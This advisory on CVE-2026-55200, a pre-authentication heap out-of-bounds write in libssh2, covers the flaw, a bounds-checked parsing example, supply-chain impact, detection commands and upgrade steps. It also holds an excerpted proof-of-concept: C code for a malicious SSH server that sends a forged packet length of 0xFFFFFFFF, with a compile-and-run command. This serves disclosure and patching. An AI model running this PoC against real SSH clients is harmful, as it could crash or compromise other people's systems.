CVE-2026-55200: In-Depth Analysis and PoC of libssh2 Pre-Authentication RCE
The article details CVE-2026-55200, a critical out-of-bounds write in libssh2 that enables unauthenticated remote code execution, explains the underlying flaw, shows a full PoC, outlines the extensive supply‑chain impact, and provides detection commands and mitigation steps.
Vulnerability Overview
libssh2 contains a critical out‑of‑bounds heap write (CVE‑2026‑55200) with a CVSS score of 9.2. The flaw is triggered during SSH transport packet handling, requires no authentication or user interaction, and can lead to remote code execution.
CVE : CVE-2026-55200
Severity : 9.2 Critical
Type : Out‑of‑Bounds Write (heap)
Affected versions : ≤ 1.11.1
Attack vector : Network
Privileges required : None
User interaction : None
Complexity : Low
Fix commit : 97acf3dfda80c91c3a8c9f2372546301d4a1a7a8
Vulnerability Mechanism
The function ssh2_transport_read() reads the incoming packet length and uses it directly for heap allocation without validation.
packet_length = read_packet_length();
buffer = malloc(packet_length);
memcpy(buffer, incoming_data, packet_length);
An attacker can set packet_length = 0xFFFFFFFF (≈4 GB). libssh2 attempts to allocate this size and copies data into the buffer, corrupting the heap.
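As an added example (not libssh2's code and not the fix commit), the same header handling written with the bounds check the vulnerable snippet lacks: the length is validated before any allocation, and only bytes that actually arrived are copied. EXAMPLE_MAX_PACKET_LENGTH, parse_ssh_packet_hardened and read_u32_be are this example's own names, and the hostile header is constructed to match the shape the PoC sends.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Upper bound on one SSH binary packet. RFC 4253 section 6.1 requires
 * implementations to accept packets up to 35000 bytes; this example treats
 * anything larger as hostile. Name and value are this example's assumption,
 * not a libssh2 identifier. */
#define EXAMPLE_MAX_PACKET_LENGTH 35000u
/* packet_length travels big-endian on the wire (RFC 4253 section 6). */
static uint32_t read_u32_be(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Validate an SSH binary packet header and copy its payload into a freshly
 * malloc'd buffer (*out, *out_len). wire/wire_len are the bytes received so
 * far. Returns the payload length, or -1 for a malformed, oversized or
 * truncated packet, in which case nothing is allocated. */
int parse_ssh_packet_hardened(const unsigned char *wire, size_t wire_len,
                              unsigned char **out, size_t *out_len) {
    *out = NULL; *out_len = 0;
    if (wire_len < 5) return -1;              /* need uint32 length + padding byte */
    uint32_t packet_length = read_u32_be(wire);
    uint8_t padding_length = wire[4];
    /* 1. The check the vulnerable code lacks: bound the attacker-controlled
     *    length BEFORE it reaches malloc/memcpy. 0xFFFFFFFF fails here. */
    if (packet_length < 1 || packet_length > EXAMPLE_MAX_PACKET_LENGTH) return -1;
    /* 2. Padding must leave room for at least the message-type byte. */
    if ((uint32_t)padding_length + 1 > packet_length) return -1;
    /* 3. Never copy more than actually arrived; the header alone is not proof. */
    if (wire_len < 4 + (size_t)packet_length) return -1;
    size_t payload_len = packet_length - padding_length - 1;
    unsigned char *buf = malloc(payload_len ? payload_len : 1);
    if (!buf) return -1;
    memcpy(buf, wire + 5, payload_len);
    *out = buf; *out_len = payload_len;
    return (int)payload_len;
}

int main(void) {
    /* Constructed header in the shape the PoC sends: length 0xFFFFFFFF, padding 8. */
    const unsigned char hostile[] = {0xFF, 0xFF, 0xFF, 0xFF, 0x08, 0x41, 0x41, 0x41};
    unsigned char *payload; size_t n;
    int rc = parse_ssh_packet_hardened(hostile, sizeof hostile, &payload, &n);
    printf("hostile header: rc=%d (rejected before any allocation)\n", rc);
    return rc == -1 ? 0 : 1;
}
```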
Exploitation Flow
Attacker
│
▼
Deploy malicious SSH server (default port 1337)
│
▼
Victim SSH client connects (e.g., libcurl, Git)
│
▼
Server sends SSH banner + forged SSH_MSG_KEXINIT
│
▼
Client processes KEXINIT and receives malicious packet
│
▼
malloc(packet_length = 0xFFFFFFFF) → heap corruption
│
┌───┐
▼ ▼
DoS      Potential RCE
Supply‑Chain Impact
libssh2 is statically linked by many mainstream projects and devices, including curl, Git, PHP, backup software, file‑transfer applications, SSH clients, automation frameworks, CI/CD platforms, infrastructure orchestration tools, network‑device firmware, Linux embedded systems, and IoT devices. The vulnerability therefore affects a wide range of software beyond libssh2 itself.
Note: OpenSSH is not affected because it does not use libssh2.
Proof‑of‑Concept
PoC source: https://github.com/xd20111/CVE-2026-55200. The PoC implements a malicious SSH server that sends a forged SSH_MSG_KEXINIT followed by a packet with length 0xFFFFFFFF.
#define SSH_BANNER "SSH-Research / Educational use ONLY\r\n"
#define MALICIOUS_PACKET_LENGTH 0xFFFFFFFFU
// 1. Send SSH banner
send(client_sock, SSH_BANNER, strlen(SSH_BANNER), 0);
// 2. Receive client banner
recv(client_sock, buffer, sizeof(buffer)-1, 0);
// 3. Send forged SSH_MSG_KEXINIT
unsigned char kexinit[] = { 0x00, 0x00, 0x00, 0x10, 0x14, /* ... */ };
send(client_sock, kexinit, sizeof(kexinit), 0);
// 4. Send malicious packet
unsigned char malicious[1024] = {0};
uint32_t pkt_len = MALICIOUS_PACKET_LENGTH; // 0xFFFFFFFF = 4 GB
unsigned char pad_len = 8;
memcpy(malicious, &pkt_len, 4);
malicious[4] = pad_len;
memset(malicious + 5, 0x41, 700); // fill 700 bytes with 'A'
size_t total = 5 + 700 + pad_len;
send(client_sock, malicious, total, 0);
Compile and run:
gcc CVE-2026-55200.c -o exploit -lpthread && ./exploit [port]
Detection Methods
# Check libssh2 version
pkg-config --modversion libssh2
# Debian/Ubuntu
dpkg -l | grep libssh2
apt-cache policy libssh2-1
# RHEL/AlmaLinux
rpm -qa | grep libssh2
dnf info libssh2
# Find executables linked with libssh2
ldconfig -p | grep libssh2
find /usr -type f -executable -exec ldd {} \; 2>/dev/null | grep libssh2
# Check if curl is statically linked with libssh2
curl --version | grep libssh2
Mitigation
Upgrade (recommended)
# Debian/Ubuntu
sudo apt update && sudo apt upgrade libssh2-1 && sudo reboot
# RHEL/AlmaLinux
sudo dnf update libssh2 && sudo reboot
# Fedora
sudo dnf upgrade --refresh libssh2 && sudo reboot
Restrict SSH Exposure
sudo ufw allow from TRUSTED_IP to any port 22
sudo ufw deny 22
Compiler Hardening
-fstack-protector-strong -D_FORTIFY_SOURCE=2 -fPIE -pie -Wl,-z,relro,-z,now
References
PoC: https://github.com/xd20111/CVE-2026-55200
NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2026-55200
libssh2 project: https://libssh2.org
Fix commit: https://github.com/libssh2/libssh2/commit/97acf3dfda80c91c3a8c9f2372546301d4a1a7a8